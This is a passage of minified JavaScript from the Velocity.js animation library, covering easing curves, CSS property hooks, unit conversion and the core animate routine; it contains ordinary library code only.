_(e,t){if(!V.State.calls[e])return!1;for(var i=V.State.calls[e][0],n=V.State.calls[e][1],o=V.State.calls[e][2],s=V.State.calls[e][4],a=!1,r=0,l=i.length;r<l;r++){var c=i[r].element;if(t||o.loop||("none"===o.display&&Y.setPropertyValue(c,"display",o.display),"hidden"===o.visibility&&Y.setPropertyValue(c,"visibility",o.visibility)),(B.queue(c)[1]===R||!/\.velocityQueueEntryFlag/i.test(B.queue(c)[1]))&&W(c)){W(c).isAnimating=!1;var u=!(W(c).rootPropertyValueCache={});B.each(Y.Lists.transforms3D,function(e,t){var i=/^scale/.test(t)?1:0,n=W(c).transformCache[t];W(c).transformCache[t]!==R&&new RegExp("^\\("+i+"[^.]").test(n)&&(u=!0,delete W(c).transformCache[t])}),o.mobileHA&&(u=!0,delete W(c).transformCache.translate3d),u&&Y.flushTransformCache(c),Y.Values.removeClass(c,"velocity-animating")}if(!t&&o.complete&&!o.loop&&r===l-1)try{o.complete.call(n,n)}catch(e){setTimeout(function(){throw e},1)}s&&!0!==o.loop&&s(n),!0!==o.loop||t||(B.each(W(c).tweensContainer,function(e,t){/^rotate/.test(e)&&360===parseFloat(t.endValue)&&(t.endValue=0,t.startValue=360)}),V(c,"reverse",{loop:!0,delay:o.delay})),!1!==o.queue&&B.dequeue(c,o.queue)}V.State.calls[e]=!1;for(var d=0,h=V.State.calls.length;d<h;d++)if(!1!==V.State.calls[d]){a=!0;break}!1===a&&(V.State.isTicking=!1,delete V.State.calls,V.State.calls=[])}var B,o,d=function(){if(j.documentMode)return j.documentMode;for(var e=7;4<e;e--){var t=j.createElement("div");if(t.innerHTML="<!--[if IE "+e+"]><span></span><![endif]-->",t.getElementsByTagName("span").length)return t=null,e}return R}(),t=(o=0,H.webkitRequestAnimationFrame||H.mozRequestAnimationFrame||function(e){var t,i=(new Date).getTime();return t=Math.max(0,16-(i-o)),o=i+t,setTimeout(function(){e(i+t)},t)}),N={isString:function(e){return"string"==typeof e},isArray:Array.isArray||function(e){return"[object Array]"===Object.prototype.toString.call(e)},isFunction:function(e){return"[object Function]"===Object.prototype.toString.call(e)},isNode:function(e){return e&&e.nodeType},isNodeList:function(e){return"object"==typeof e&&/^\[object (HTMLCollection|NodeList|Object)\]$/.test(Object.prototype.toString.call(e))&&e.length!==R&&(0===e.length||"object"==typeof e[0]&&0<e[0].nodeType)},isWrapped:function(e){return e&&(e.jquery||H.Zepto&&H.Zepto.zepto.isZ(e))},isSVG:function(e){return H.SVGElement&&e instanceof SVGElement},isEmptyObject:function(e){var t;for(t in e)return!1;return!0}},i=!1;if(e.fn&&e.fn.jquery?(B=e,i=!0):B=H.Velocity.Utilities,d<=8&&!i)throw new Error("Velocity: IE8 and below require jQuery to be loaded before Velocity.");if(!(d<=7)){var m=400,s="swing",V={State:{isMobile:/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent),isAndroid:/Android/i.test(navigator.userAgent),isGingerbread:/Android 2\.3\.[3-7]/i.test(navigator.userAgent),isChrome:H.chrome,isFirefox:/Firefox/i.test(navigator.userAgent),prefixElement:j.createElement("div"),prefixMatches:{},scrollAnchor:null,scrollPropertyLeft:null,scrollPropertyTop:null,isTicking:!1,calls:[]},CSS:{},Utilities:B,Sequences:{},Easings:{},Promise:H.Promise,defaults:{queue:"",duration:m,easing:s,begin:null,complete:null,progress:null,display:R,loop:!1,delay:!1,mobileHA:!0,_cacheValues:!0},init:function(e){B.data(e,"velocity",{isSVG:N.isSVG(e),isAnimating:!1,computedStyle:null,tweensContainer:null,rootPropertyValueCache:{},transformCache:{}})},animate:null,hook:null,mock:!1,version:{major:1,minor:0,patch:0},debug:!1};H.pageYOffset!==R?(V.State.scrollAnchor=H,V.State.scrollPropertyLeft="pageXOffset",V.State.scrollPropertyTop="pageYOffset"):(V.State.scrollAnchor=j.documentElement||j.body.parentNode||j.body,V.State.scrollPropertyLeft="scrollLeft",V.State.scrollPropertyTop="scrollTop");var a=function(){function y(e){return-e.tension*e.x-e.friction*e.v}function w(e,t,i){var n={x:e.x+i.dx*t,v:e.v+i.dv*t,tension:e.tension,friction:e.friction};return{dx:n.v,dv:y(n)}}return function e(t,i,n){var o,s,a,r,l,c,u,d,h,p,f,m={x:-1,v:0,tension:null,friction:null},g=[0],v=0;for(t=parseFloat(t)||500,i=parseFloat(i)||20,n=n||null,m.tension=t,m.friction=i,(o=null!==n)?s=(v=e(t,i))/n*.016:s=.016;l=s,void 0,c={dx:(r=a||m).v,dv:y(r)},u=w(r,.5*l,c),d=w(r,.5*l,u),h=w(r,l,d),p=1/6*(c.dx+2*(u.dx+d.dx)+h.dx),f=1/6*(c.dv+2*(u.dv+d.dv)+h.dv),r.x=r.x+p*l,r.v=r.v+f*l,a=r,g.push(1+a.x),v+=16,1e-4<Math.abs(a.x)&&1e-4<Math.abs(a.v););return o?function(e){return g[e*(g.length-1)|0]}:v}}();V.Easings={linear:function(e){return e},swing:function(e){return.5-Math.cos(e*Math.PI)/2},spring:function(e){return 1-Math.cos(4.5*e*Math.PI)*Math.exp(6*-e)}},B.each([["ease",[.25,.1,.25,1]],["ease-in",[.42,0,1,1]],["ease-out",[0,0,.58,1]],["ease-in-out",[.42,0,.58,1]],["easeInSine",[.47,0,.745,.715]],["easeOutSine",[.39,.575,.565,1]],["easeInOutSine",[.445,.05,.55,.95]],["easeInQuad",[.55,.085,.68,.53]],["easeOutQuad",[.25,.46,.45,.94]],["easeInOutQuad",[.455,.03,.515,.955]],["easeInCubic",[.55,.055,.675,.19]],["easeOutCubic",[.215,.61,.355,1]],["easeInOutCubic",[.645,.045,.355,1]],["easeInQuart",[.895,.03,.685,.22]],["easeOutQuart",[.165,.84,.44,1]],["easeInOutQuart",[.77,0,.175,1]],["easeInQuint",[.755,.05,.855,.06]],["easeOutQuint",[.23,1,.32,1]],["easeInOutQuint",[.86,0,.07,1]],["easeInExpo",[.95,.05,.795,.035]],["easeOutExpo",[.19,1,.22,1]],["easeInOutExpo",[1,0,0,1]],["easeInCirc",[.6,.04,.98,.335]],["easeOutCirc",[.075,.82,.165,1]],["easeInOutCirc",[.785,.135,.15,.86]]],function(e,t){V.Easings[t[0]]=n.apply(null,t[1])});var Y=V.CSS={RegEx:{isHex:/^#([A-f\d]{3}){1,2}$/i,valueUnwrap:/^[A-z]+\((.*)\)$/i,wrappedValueAlreadyExtracted:/[0-9.]+ [0-9.]+ [0-9.]+( [0-9.]+)?/,valueSplit:/([A-z]+\(.+\))|(([A-z0-9#-.]+?)(?=\s|$))/gi},Lists:{colors:["fill","stroke","stopColor","color","backgroundColor","borderColor","borderTopColor","borderRightColor","borderBottomColor","borderLeftColor","outlineColor"],transformsBase:["translateX","translateY","scale","scaleX","scaleY","skewX","skewY","rotateZ"],transforms3D:["transformPerspective","translateZ","scaleZ","rotateX","rotateY"]},Hooks:{templates:{textShadow:["Color X Y Blur","black 0px 0px 0px"],boxShadow:["Color X Y Blur Spread","black 0px 0px 0px 0px"],clip:["Top Right Bottom Left","0px 0px 0px 0px"],backgroundPosition:["X Y","0% 0%"],transformOrigin:["X Y Z","50% 50% 0px"],perspectiveOrigin:["X Y","50% 50%"]},registered:{},register:function(){for(var e=0;e<Y.Lists.colors.length;e++)Y.Hooks.templates[Y.Lists.colors[e]]=["Red Green Blue Alpha","255 255 255 1"];var t,i,n;if(d)for(t in Y.Hooks.templates){n=(i=Y.Hooks.templates[t])[0].split(" ");var o=i[1].match(Y.RegEx.valueSplit);"Color"===n[0]&&(n.push(n.shift()),o.push(o.shift()),Y.Hooks.templates[t]=[n.join(" "),o.join(" ")])}for(t in Y.Hooks.templates)for(var e in n=(i=Y.Hooks.templates[t])[0].split(" ")){var s=t+n[e],a=e;Y.Hooks.registered[s]=[t,a]}},getRoot:function(e){var t=Y.Hooks.registered[e];return t?t[0]:e},cleanRootPropertyValue:function(e,t){return Y.RegEx.valueUnwrap.test(t)&&(t=t.match(Y.Hooks.RegEx.valueUnwrap)[1]),Y.Values.isCSSNullValue(t)&&(t=Y.Hooks.templates[e][1]),t},extractValue:function(e,t){var i=Y.Hooks.registered[e];if(i){var n=i[0],o=i[1];return(t=Y.Hooks.cleanRootPropertyValue(n,t)).toString().match(Y.RegEx.valueSplit)[o]}return t},injectValue:function(e,t,i){var n=Y.Hooks.registered[e];if(n){var o,s=n[0],a=n[1];return(o=(i=Y.Hooks.cleanRootPropertyValue(s,i)).toString().match(Y.RegEx.valueSplit))[a]=t,o.join(" ")}return i}},Normalizations:{registered:{clip:function(e,t,i){switch(e){case"name":return"clip";case"extract":var n;return Y.RegEx.wrappedValueAlreadyExtracted.test(i)?n=i:n=(n=i.toString().match(Y.RegEx.valueUnwrap))?n[1].replace(/,(\s+)?/g," "):i,n;case"inject":return"rect("+i+")"}},opacity:function(e,t,i){if(d<=8)switch(e){case"name":return"filter";case"extract":var n=i.toString().match(/alpha\(opacity=(.*)\)/i);return n?n[1]/100:1;case"inject":return(t.style.zoom=1)<=parseFloat(i)?"":"alpha(opacity="+parseInt(100*parseFloat(i),10)+")"}else switch(e){case"name":return"opacity";case"extract":case"inject":return i}}},register:function(){d<=9||V.State.isGingerbread||(Y.Lists.transformsBase=Y.Lists.transformsBase.concat(Y.Lists.transforms3D));for(var e=0;e<Y.Lists.transformsBase.length;e++)!function(){var o=Y.Lists.transformsBase[e];Y.Normalizations.registered[o]=function(e,t,i){switch(e){case"name":return"transform";case"extract":return W(t)===R||W(t).transformCache[o]===R?/^scale/i.test(o)?1:0:W(t).transformCache[o].replace(/[()]/g,"");case"inject":var n=!1;switch(o.substr(0,o.length-1)){case"translate":n=!/(%|px|em|rem|vw|vh|\d)$/i.test(i);break;case"scal":case"scale":V.State.isAndroid&&W(t).transformCache[o]===R&&i<1&&(i=1),n=!/(\d)$/i.test(i);break;case"skew":n=!/(deg|\d)$/i.test(i);break;case"rotate":n=!/(deg|\d)$/i.test(i)}return n||(W(t).transformCache[o]="("+i+")"),W(t).transformCache[o]}}}();for(e=0;e<Y.Lists.colors.length;e++)!function(){var a=Y.Lists.colors[e];Y.Normalizations.registered[a]=function(e,t,i){switch(e){case"name":return a;case"extract":var n;if(Y.RegEx.wrappedValueAlreadyExtracted.test(i))n=i;else{var o,s={black:"rgb(0, 0, 0)",blue:"rgb(0, 0, 255)",gray:"rgb(128, 128, 128)",green:"rgb(0, 128, 0)",red:"rgb(255, 0, 0)",white:"rgb(255, 255, 255)"};/^[A-z]+$/i.test(i)?o=s[i]!==R?s[i]:s.black:Y.RegEx.isHex.test(i)?o="rgb("+Y.Values.hexToRgb(i).join(" ")+")":/^rgba?\(/i.test(i)||(o=s.black),n=(o||i).toString().match(Y.RegEx.valueUnwrap)[1].replace(/,(\s+)?/g," ")}return d<=8||3!==n.split(" ").length||(n+=" 1"),n;case"inject":return d<=8?4===i.split(" ").length&&(i=i.split(/\s+/).slice(0,3).join(" ")):3===i.split(" ").length&&(i+=" 1"),(d<=8?"rgb":"rgba")+"("+i.replace(/\s+/g,",").replace(/\.(\d)+(?=,)/g,"")+")"}}}()}},Names:{camelCase:function(e){return e.replace(/-(\w)/g,function(e,t){return t.toUpperCase()})},SVGAttribute:function(e){var t="width|height|x|y|cx|cy|r|rx|ry|x1|x2|y1|y2";return(d||V.State.isAndroid&&!V.State.isChrome)&&(t+="|transform"),new RegExp("^("+t+")$","i").test(e)},prefixCheck:function(e){if(V.State.prefixMatches[e])return[V.State.prefixMatches[e],!0];for(var t=["","Webkit","Moz","ms","O"],i=0,n=t.length;i<n;i++){var o;if(o=0===i?e:t[i]+e.replace(/^\w/,function(e){return e.toUpperCase()}),N.isString(V.State.prefixElement.style[o]))return[V.State.prefixMatches[e]=o,!0]}return[e,!1]}},Values:{hexToRgb:function(e){var t;return e=e.replace(/^#?([a-f\d])([a-f\d])([a-f\d])$/i,function(e,t,i,n){return t+t+i+i+n+n}),(t=/^#?([a-f\d]{2})([a-f\d]{2})([a-f\d]{2})$/i.exec(e))?[parseInt(t[1],16),parseInt(t[2],16),parseInt(t[3],16)]:[0,0,0]},isCSSNullValue:function(e){return 0==e||/^(none|auto|transparent|(rgba\(0, ?0, ?0, ?0\)))$/i.test(e)},getUnitType:function(e){return/^(rotate|skew)/i.test(e)?"deg":/(^(scale|scaleX|scaleY|scaleZ|alpha|flexGrow|flexHeight|zIndex|fontWeight)$)|((opacity|red|green|blue|alpha)$)/i.test(e)?"":"px"},getDisplayType:function(e){var t=e.tagName.toString().toLowerCase();return/^(b|big|i|small|tt|abbr|acronym|cite|code|dfn|em|kbd|strong|samp|var|a|bdo|br|img|map|object|q|script|span|sub|sup|button|input|label|select|textarea)$/i.test(t)?"inline":/^(li)$/i.test(t)?"list-item":/^(tr)$/i.test(t)?"table-row":"block"},addClass:function(e,t){e.classList?e.classList.add(t):e.className+=(e.className.length?" ":"")+t},removeClass:function(e,t){e.classList?e.classList.remove(t):e.className=e.className.toString().replace(new RegExp("(^|\\s)"+t.split(" ").join("|")+"(\\s|$)","gi")," ")}},getPropertyValue:function(e,t,i,c){function u(e,t){function i(){s&&Y.setPropertyValue(e,"display","none")}var n=0;if(d<=8)n=B.css(e,t);else{var o,s=!1;if(/^(width|height)$/.test(t)&&0===Y.getPropertyValue(e,"display")&&(s=!0,Y.setPropertyValue(e,"display",Y.Values.getDisplayType(e))),!c){if("height"===t&&"border-box"!==Y.getPropertyValue(e,"boxSizing").toString().toLowerCase()){var a=e.offsetHeight-(parseFloat(Y.getPropertyValue(e,"borderTopWidth"))||0)-(parseFloat(Y.getPropertyValue(e,"borderBottomWidth"))||0)-(parseFloat(Y.getPropertyValue(e,"paddingTop"))||0)-(parseFloat(Y.getPropertyValue(e,"paddingBottom"))||0);return i(),a}if("width"===t&&"border-box"!==Y.getPropertyValue(e,"boxSizing").toString().toLowerCase()){var r=e.offsetWidth-(parseFloat(Y.getPropertyValue(e,"borderLeftWidth"))||0)-(parseFloat(Y.getPropertyValue(e,"borderRightWidth"))||0)-(parseFloat(Y.getPropertyValue(e,"paddingLeft"))||0)-(parseFloat(Y.getPropertyValue(e,"paddingRight"))||0);return i(),r}}o=W(e)===R?H.getComputedStyle(e,null):W(e).computedStyle?W(e).computedStyle:W(e).computedStyle=H.getComputedStyle(e,null),(d||V.State.isFirefox)&&"borderColor"===t&&(t="borderTopColor"),(""===(n=9===d&&"filter"===t?o.getPropertyValue(t):o[t])||null===n)&&(n=e.style[t]),i()}if("auto"===n&&/^(top|right|bottom|left)$/i.test(t)){var l=u(e,"position");("fixed"===l||"absolute"===l&&/top|left/i.test(t))&&(n=B(e).position()[t]+"px")}return n}var n;if(Y.Hooks.registered[t]){var o=t,s=Y.Hooks.getRoot(o);i===R&&(i=Y.getPropertyValue(e,Y.Names.prefixCheck(s)[0])),Y.Normalizations.registered[s]&&(i=Y.Normalizations.registered[s]("extract",e,i)),n=Y.Hooks.extractValue(o,i)}else if(Y.Normalizations.registered[t]){var a,r;"transform"!==(a=Y.Normalizations.registered[t]("name",e))&&(r=u(e,Y.Names.prefixCheck(a)[0]),Y.Values.isCSSNullValue(r)&&Y.Hooks.templates[t]&&(r=Y.Hooks.templates[t][1])),n=Y.Normalizations.registered[t]("extract",e,r)}return/^[\d-]/.test(n)||(n=W(e)&&W(e).isSVG&&Y.Names.SVGAttribute(t)?/^(height|width)$/i.test(t)?e.getBBox()[t]:e.getAttribute(t):u(e,Y.Names.prefixCheck(t)[0])),Y.Values.isCSSNullValue(n)&&(n=0),2<=V.debug&&console.log("Get "+t+": "+n),n},setPropertyValue:function(e,t,i,n,o){var s=t;if("scroll"===t)o.container?o.container["scroll"+o.direction]=i:"Left"===o.direction?H.scrollTo(i,o.alternateValue):H.scrollTo(o.alternateValue,i);else if(Y.Normalizations.registered[t]&&"transform"===Y.Normalizations.registered[t]("name",e))Y.Normalizations.registered[t]("inject",e,i),s="transform",i=W(e).transformCache[t];else{if(Y.Hooks.registered[t]){var a=t,r=Y.Hooks.getRoot(t);n=n||Y.getPropertyValue(e,r),i=Y.Hooks.injectValue(a,i,n),t=r}if(Y.Normalizations.registered[t]&&(i=Y.Normalizations.registered[t]("inject",e,i),t=Y.Normalizations.registered[t]("name",e)),s=Y.Names.prefixCheck(t)[0],d<=8)try{e.style[s]=i}catch(e){V.debug&&console.log("Browser does not support ["+i+"] for ["+s+"]")}else W(e)&&W(e).isSVG&&Y.Names.SVGAttribute(t)?e.setAttribute(t,i):e.style[s]=i;2<=V.debug&&console.log("Set "+t+" ("+s+"): "+i)}return[s,i]},flushTransformCache:function(t){function e(e){return parseFloat(Y.getPropertyValue(t,e))}var i="";if((d||V.State.isAndroid&&!V.State.isChrome)&&W(t).isSVG){var n={translate:[e("translateX"),e("translateY")],skewX:[e("skewX")],skewY:[e("skewY")],scale:1!==e("scale")?[e("scale"),e("scale")]:[e("scaleX"),e("scaleY")],rotate:[e("rotateZ"),0,0]};B.each(W(t).transformCache,function(e){/^translate/i.test(e)?e="translate":/^scale/i.test(e)?e="scale":/^rotate/i.test(e)&&(e="rotate"),n[e]&&(i+=e+"("+n[e].join(" ")+") ",delete n[e])})}else{var o,s;B.each(W(t).transformCache,function(e){return o=W(t).transformCache[e],"transformPerspective"===e?(s=o,!0):(9===d&&"rotateZ"===e&&(e="rotate"),void(i+=e+o+" "))}),s&&(i="perspective"+s+" "+i)}Y.setPropertyValue(t,"transform",i)}};Y.Hooks.register(),Y.Normalizations.register(),V.hook=function(e,n,o){var s=R;return e=f(e),B.each(e,function(e,t){if(W(t)===R&&V.init(t),o===R)s===R&&(s=V.CSS.getPropertyValue(t,n));else{var i=V.CSS.setPropertyValue(t,n,o);"transform"===i[0]&&V.CSS.flushTransformCache(t),s=i}}),s};var g=function(){function e(){return t?A.promise||null:i}var t,i,n,z,E,O,o=arguments[0]&&(B.isPlainObject(arguments[0].properties)&&!arguments[0].properties.names||N.isString(arguments[0].properties));if(N.isWrapped(this)?(t=!1,n=0,i=z=this):(t=!0,n=1,z=o?arguments[0].elements:arguments[0]),z=f(z)){o?(E=arguments[0].properties,O=arguments[0].options):(E=arguments[n],O=arguments[n+1]);var P=z.length,I=0;if("stop"!==E&&!B.isPlainObject(O)){O={};for(var s=n+1;s<arguments.length;s++)N.isArray(arguments[s])||!/fast|normal|slow/i.test(arguments[s].toString())&&!/^\d/.test(arguments[s])?N.isString(arguments[s])||N.isArray(arguments[s])?O.easing=arguments[s]:N.isFunction(arguments[s])&&(O.complete=arguments[s]):O.duration=arguments[s]}var M,A={promise:null,resolver:null,rejecter:null};switch(t&&V.Promise&&(A.promise=new V.Promise(function(e,t){A.resolver=e,A.rejecter=t})),E){case"scroll":M="scroll";break;case"reverse":M="reverse";break;case"stop":B.each(z,function(e,t){W(t)&&W(t).delayTimer&&(clearTimeout(W(t).delayTimer.setTimeout),W(t).delayTimer.next&&W(t).delayTimer.next(),delete W(t).delayTimer)});var a=[];return B.each(V.State.calls,function(o,t){t&&B.each(t[1],function(e,i){var n=N.isString(O)?O:"";return O!==R&&t[2].queue!==n||void B.each(z,function(e,t){t===i&&(O!==R&&(B.each(B.queue(t,n),function(e,t){N.isFunction(t)&&t(null,!0)}),B.queue(t,n,[])),W(t)&&""===n&&B.each(W(t).tweensContainer,function(e,t){t.endValue=t.currentValue}),a.push(o))})})}),B.each(a,function(e,t){_(t,!0)}),A.promise&&A.resolver(z),e();default:if(!B.isPlainObject(E)||N.isEmptyObject(E)){if(N.isString(E)&&V.Sequences[E]){var r=(u=B.extend({},O)).duration,l=u.delay||0;return!0===u.backwards&&(z=z.reverse()),B.each(z,function(e,t){parseFloat(u.stagger)?u.delay=l+parseFloat(u.stagger)*e:N.isFunction(u.stagger)&&(u.delay=l+u.stagger.call(t,e,P)),u.drag&&(u.duration=parseFloat(r)||(/^(callout|transition)/.test(E)?1e3:m),u.duration=Math.max(u.duration*(u.backwards?1-e/P:(e+1)/P),.75*u.duration,200)),V.Sequences[E].call(t,t,u||{},e,P,z,A.promise?A:R)}),e()}var c="Velocity: First argument ("+E+") was not a property map, a known action, or a registered sequence. Aborting.";return A.promise?A.rejecter(new Error(c)):console.log(c),e()}M="start"}var u,d,L={lastParent:null,lastPosition:null,lastFontSize:null,lastPercentToPxWidth:null,lastPercentToPxHeight:null,lastEmToPx:null,remToPx:null,vwToPx:null,vhToPx:null},D=[];if(B.each(z,function(e,t){N.isNode(t)&&function(){function i(e){function u(e,t){var i=R,n=R,o=R;return N.isArray(e)?(i=e[0],!N.isArray(e[1])&&/^[\d-]/.test(e[1])||N.isFunction(e[1])||Y.RegEx.isHex.test(e[1])?o=e[1]:(N.isString(e[1])&&!Y.RegEx.isHex.test(e[1])||N.isArray(e[1]))&&(n=t?e[1]:F(e[1],T.duration),e[2]!==R&&(o=e[2]))):i=e,t||(n=n||T.easing),N.isFunction(i)&&(i=i.call(k,I,P)),N.isFunction(o)&&(o=o.call(k,I,P)),[i||0,n,o]}function t(e,t){var i,n;return n=(t||0).toString().toLowerCase().replace(/[%A-z]+$/,function(e){return i=e,""}),i||(i=Y.Values.getUnitType(e)),[n,i]}function i(){var e={myParent:k.parentNode||j.body,position:Y.getPropertyValue(k,"position"),fontSize:Y.getPropertyValue(k,"fontSize")},t=e.position===L.lastPosition&&e.myParent===L.lastParent,i=e.fontSize===L.lastFontSize;L.lastParent=e.myParent,L.lastPosition=e.position,L.lastFontSize=e.fontSize;var n={};if(i&&t)n.emToPx=L.lastEmToPx,n.percentToPxWidth=L.lastPercentToPxWidth,n.percentToPxHeight=L.lastPercentToPxHeight;else{var o=W(k).isSVG?j.createElementNS("http://www.w3.org/2000/svg","rect"):j.createElement("div");V.init(o),e.myParent.appendChild(o),B.each(["overflow","overflowX","overflowY"],function(e,t){V.CSS.setPropertyValue(o,t,"hidden")}),V.CSS.setPropertyValue(o,"position",e.position),V.CSS.setPropertyValue(o,"fontSize",e.fontSize),V.CSS.setPropertyValue(o,"boxSizing","content-box"),B.each(["minWidth","maxWidth","width","minHeight","maxHeight","height"],function(e,t){V.CSS.setPropertyValue(o,t,"100%")}),V.CSS.setPropertyValue(o,"paddingLeft","100em"),n.percentToPxWidth=L.lastPercentToPxWidth=(parseFloat(Y.getPropertyValue(o,"width",null,!0))||1)/100,n.percentToPxHeight=L.lastPercentToPxHeight=(parseFloat(Y.getPropertyValue(o,"height",null,!0))||1)/100,n.emToPx=L.lastEmToPx=(parseFloat(Y.getPropertyValue(o,"paddingLeft"))||1)/100,e.myParent.removeChild(o)}return null===L.remToPx&&(L.remToPx=parseFloat(Y.getPropertyValue(j.body,"fontSize"))||16),null===L.vwToPx&&(L.vwToPx=parseFloat(H.innerWidth)/100,L.vhToPx=parseFloat(H.innerHeight)/100),n.remToPx=L.remToPx,n.vwToPx=L.vwToPx,n.vhToPx=L.vhToPx,1<=V.debug&&console.log("Unit ratios: "+JSON.stringify(n),k),n}if(T.begin&&0===I)try{T.begin.call(z,z)}catch(e){setTimeout(function(){throw e},1)}if("scroll"===M){var n,o,s,a=/^x$/i.test(T.axis)?"Left":"Top",r=parseFloat(T.offset)||0;T.container?N.isWrapped(T.container)||N.isNode(T.container)?(T.container=T.container[0]||T.container,s=(n=T.container["scroll"+a])+B(k).position()[a.toLowerCase()]+r):T.container=null:(n=V.State.scrollAnchor[V.State["scrollProperty"+a]],o=V.State.scrollAnchor[V.State["scrollProperty"+("Left"===a?"Top":"Left")]],s=B(k).offset()[a.toLowerCase()]+r),S={scroll:{rootPropertyValue:!1,startValue:n,currentValue:n,endValue:s,unitType:"",easing:T.easing,scrollData:{container:T.container,direction:a,alternateValue:o}},element:k},V.debug&&console.log("tweensContainer (scroll): ",S.scroll,k)}else if("reverse"===M){if(!W(k).tweensContainer)return void B.dequeue(k,T.queue);"none"===W(k).opts.display&&(W(k).opts.display="auto"),"hidden"===W(k).opts.visibility&&(W(k).opts.visibility="visible"),W(k).opts.loop=!1,W(k).opts.begin=null,W(k).opts.complete=null,O.easing||delete T.easing,O.duration||delete T.duration,T=B.extend({},W(k).opts,T);var l=B.extend(!0,{},W(k).tweensContainer);for(var c in l)if("element"!==c){var d=l[c].startValue;l[c].startValue=l[c].currentValue=l[c].endValue,l[c].endValue=d,N.isEmptyObject(O)||(l[c].easing=T.easing),V.debug&&console.log("reverse tweensContainer ("+c+"): "+JSON.stringify(l[c]),k)}S=l}else if("start"===M){for(var h in W(k).tweensContainer&&!0===W(k).isAnimating&&(l=W(k).tweensContainer),B.each(E,function(e,t){if(RegExp("^"+Y.Lists.colors.join("$|^")+"$").test(e)){var i=u(t,!0),n=i[0],o=i[1],s=i[2];if(Y.RegEx.isHex.test(n)){for(var a=["Red","Green","Blue"],r=Y.Values.hexToRgb(n),l=s?Y.Values.hexToRgb(s):R,c=0;c<a.length;c++)E[e+a[c]]=[r[c],o,l?l[c]:l];delete E[e]}}}),E){var p=u(E[h]),f=p[0],m=p[1],g=p[2];h=Y.Names.camelCase(h);var v=Y.Hooks.getRoot(h),y=!1;if(W(k).isSVG||!1!==Y.Names.prefixCheck(v)[1]||Y.Normalizations.registered[v]!==R){(T.display!==R&&null!==T.display&&"none"!==T.display||T.visibility&&"hidden"!==T.visibility)&&/opacity|filter/.test(h)&&!g&&0!==f&&(g=0),T._cacheValues&&l&&l[h]?(g===R&&(g=l[h].endValue+l[h].unitType),y=W(k).rootPropertyValueCache[v]):Y.Hooks.registered[h]?g===R?(y=Y.getPropertyValue(k,v),g=Y.getPropertyValue(k,h,y)):y=Y.Hooks.templates[v][1]:g===R&&(g=Y.getPropertyValue(k,h));var w,b,_,x=!1;if(g=(w=t(h,g))[0],_=w[1],f=(w=t(h,f))[0].replace(/^([+-\/*])=/,function(e,t){return x=t,""}),b=w[1],g=parseFloat(g)||0,f=parseFloat(f)||0,"%"===b&&(/^(fontSize|lineHeight)$/.test(h)?(f/=100,b="em"):/^scale/.test(h)?(f/=100,b=""):/(Red|Green|Blue)$/i.test(h)&&(f=f/100*255,b="")),/[\/*]/.test(x))b=_;else if(_!==b&&0!==g)if(0===f)b=_;else{$=$||i();var C=/margin|padding|left|right|width|text|word|letter/i.test(h)||/X$/.test(h)||"x"===h?"x":"y";switch(_){case"%":g*="x"===C?$.percentToPxWidth:$.percentToPxHeight;break;case"px":break;default:g*=$[_+"ToPx"]}switch(b){case"%":g*=1/("x"===C?$.percentToPxWidth:$.percentToPxHeight);break;case"px":break;default:g*=1/$[b+"ToPx"]}}switch(x){case"+":f=g+f;break;case"-":f=g-f;break;case"*":f*=g;break;case"/":f=g/f}S[h]={rootPropertyValue:y,startValue:g,currentValue:g,endValue:f,unitType:b,easing:m},V.debug&&console.log("tweensContainer ("+h+"): "+JSON.stringify(S[h]),k)}else V.debug&&console.log("Skipping ["+v+"] due to a lack of browser support.")}S.element=k}S.element&&(Y.Values.addClass(k,"velocity-animating"),D.push(S),""===T.queue&&(W(k).tweensContainer=S,W(k).opts=T),W(k).isAnimating=!0,I===P-1?(1e4<V.State.calls.length&&(V.State.calls=function(e){for(var t=-1,i=e?e.length:0,n=[];++t<i;){var o=e[t];o&&n.push(o)}return n}(V.State.calls)),V.State.calls.push([D,z,T,null,A.resolver]),!1===V.State.isTicking&&(V.State.isTicking=!0,q())):I++)}var $,k=this,T=B.extend({},V.defaults,O),S={};if(W(k)===R&&V.init(k),parseFloat(T.delay)&&!1!==T.queue&&B.queue(k,T.queue,function(e){V.velocityQueueEntryFlag=!0,W(k).delayTimer={setTimeout:setTimeout(e,parseFloat(T.delay)),next:e}}),!0===V.mock)T.duration=1;else switch(T.duration.toString().toLowerCase()){case"fast":T.duration=200;break;case"normal":T.duration=m;break;case"slow":T.duration=600;break;default:T.duration=parseFloat(T.duration)||1}T.easing=F(T.easing,T.duration),T.begin&&!N.isFunction(T.begin)&&(T.begin=null),T.progress&&!N.isFunction(T.progress)&&(T.progress=null),T.complete&&!N.isFunction(T.complete)&&(T.complete=null),T.display!==R&&null!==T.display&&(T.display=T.display.toString().toLowerCase(),"auto"===T.display&&(T.display=V.CSS.Values.getDisplayType(k))),T.visibility&&(T.visibility=T.visibility.toString().toLowerCase()),T.mobileHA=T.mobileHA&&V.State.isMobile&&!V.State.isGingerbread,!1===T.queue?T.delay?setTimeout(i,T.delay):i():B.queue(k,T.queue,function(e,t){return!0===t?(A.promise&&A.resolver(z),!0):(V.velocityQueueEntryFlag=!0,void i())}),""!==T.queue&&"fx"!==T.queue||"inprogress"===B.queue(k)[0]||B.dequeue(k)}.call(t)}),(u=B.extend({},V.defaults,O)).loop=parseInt(u.loop),d=2*u.loop-1,u.loop)for(var h=0;h<d;h++){var p={delay:u.delay};h===d-1&&(p.display=u.display,p.visibility=u.visibility,p.complete=u.complete),g(z,"reverse",p)}return e()}};(V=B.extend(g,V)).animate=g;var x=H.requestAnimationFrame||t;return V.State.isMobile||j.hidden===R||j.addEventListener("visibilitychange",function(){j.hidden?(x=function(e){return setTimeout(function(){e(!0)},16)},q()):x=H.requestAnimationFrame||t}),e.Velocity=V,e!==H&&(e.fn.velocity=g,e.fn.velocity.defaults=V.defaults),B.each(["Down","Up"],function(e,d){V.Sequences["slide"+d]=function(i,e,t,n,o,s){var a=B.extend({},e),r=a.begin,l=a.complete,c={height:"",marginTop:"",marginBottom:"",paddingTop:"",paddingBottom:""},u={};a.display===R&&(a.display="Down"===d?"inline"===V.CSS.Values.getDisplayType(i)?"inline-block":"block":"none"),a.begin=function(){for(var e in r&&r.call(o,o),u.overflow=i.style.overflow,i.style.overflow="hidden",c){u[e]=i.style[e];var t=V.CSS.getPropertyValue(i,e);c[e]="Down"===d?[t,0]:[0,t]}},a.complete=function(){for(var e in 